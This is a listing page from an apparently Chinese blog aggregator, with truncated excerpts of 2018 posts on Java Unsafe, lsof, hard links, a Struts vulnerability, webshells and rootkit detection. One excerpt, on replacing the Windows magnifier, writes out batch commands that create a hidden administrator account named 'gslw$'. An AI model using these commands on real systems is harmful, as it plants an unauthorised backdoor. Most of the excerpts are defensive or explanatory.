一、Unsafe Java无法直接访问底层操作系统,而是通过本地(native)方法来访问。不过尽管如此,JVM还是开了一个后门,JDK中有一个类Unsafe,它提供了硬件级别的原子操作。 这个类尽管里面的方法都是public的,但是并没有办法使用它们,JDK API文档也没有提供任何关于这个类的方 ...
分类:
编程语言 时间:
2018-11-16 17:41:59
阅读次数:
224
extundelete [root@xuegod63 ~]# lsof -p 43641 #一般用于查看木马进程,在读哪些文件 [root@xuegod63 ~]# lsof -i :22 #用于查看端口,或查看黑客开启的后门端口是哪个进程在使用 原理汇总电源-bios引导(硬件初始化)-MBR引导 ...
分类:
系统相关 时间:
2018-11-16 17:40:36
阅读次数:
267
硬链接:在linux文件系统中多个文件名指向同一个索引节点(Inode)是正常允许的。硬链接文件就相当于文件的另一个入口。 硬链接的作用:允许一个文件拥有多个有效路径(多个入口),这样用户就可以建立硬链接到重要文件,以防止“误删”源数据 (很多硬件存储,如netapp存储中的快照功能就应用了这个原理 ...
分类:
其他好文 时间:
2018-11-13 02:50:03
阅读次数:
173
2018年11月8日,SINE安全监控检测中心,检测到ApacheStruts官方更新了一个Struts漏洞补丁,这个漏洞是ApacheStruts目前最新的漏洞,影响范围较广,低于ApacheStruts2.3.35的版本都会受到此次Struts漏洞的***,目前apache官方更新的漏洞补丁,主要是修复commonsfileupload上传库出现的安全问题,这个库可以远程执行代码,上传***后门到
分类:
Web程序 时间:
2018-11-08 18:23:25
阅读次数:
173
嗅探欺骗: 在目标机上安装嗅探工具窃取管理员的密码 放大镜替换: 构造批处理: @echo off net user gslw$ test168 /add net localgroup administrators gslw$ /add %Windir%\system32\nagnify.exe e ...
0x01 GNU ld.so动态库搜索路径 参考材料:https://en.wikipedia.org/wiki/Rpath 下面介绍GNU ld.so加载动态库的先后顺序: LD_PRELOAD环境变量指定的路径(一般对应文件/etc/ld.so.preload); ELF .dynamic节中D ...
分类:
其他好文 时间:
2018-10-28 11:17:27
阅读次数:
169
2018年10月27日接到新客户网站服务器被上传了webshell脚本***后门问题的求助,对此我们sine安全公司针对此阿里云提示的安全问题进行了详细分析,ECS服务器被阿里云提示异常网络连接-可疑WebShell通信行为,还会伴有,网站后门-发现后门(Webshell)文件,以及提示网站后门-一句话webshell的安全提示,但是大部分都是单独服务器ECS的用户,具体被阿里云提示的截图如下:点开
分类:
Web程序 时间:
2018-10-27 16:39:11
阅读次数:
189
一、标准ASPX一句话木马 .NET平台下的一句话木马则百年不变,最常见的当属下面这句 想必这句话已经成大多数防御产品的标准样本,除此以外还有上传文件的一句话,像这种的从严格意义上不能算是一句话木马,只是一个简单的上传文件的功能,实际的操作还是大马或者小马的操作行为。 二、ASHX一句话木马 ash ...
分类:
其他好文 时间:
2018-10-26 14:20:53
阅读次数:
338
一、关于rookitrootkit是Linux平台下最常见的一种***后门工具,它主要通过替换系统文件来达到***和和隐蔽的目的,这种***比普通***后门更加危险和隐蔽,普通的检测工具和检查手段很难发现这种***。rootkit***能力极强,对系统的危害很大,它通过一套工具来建立后门和隐藏行迹,从而让***者保住权限,以使它在任何时候都可以使用root权限登录到系统。二、rootkit后门检测工具RKHun
分类:
系统相关 时间:
2018-10-25 19:30:37
阅读次数:
601
Pull strings? How bad it is ! and what should we doo?? ...
分类:
其他好文 时间:
2018-10-22 22:17:34
阅读次数:
198
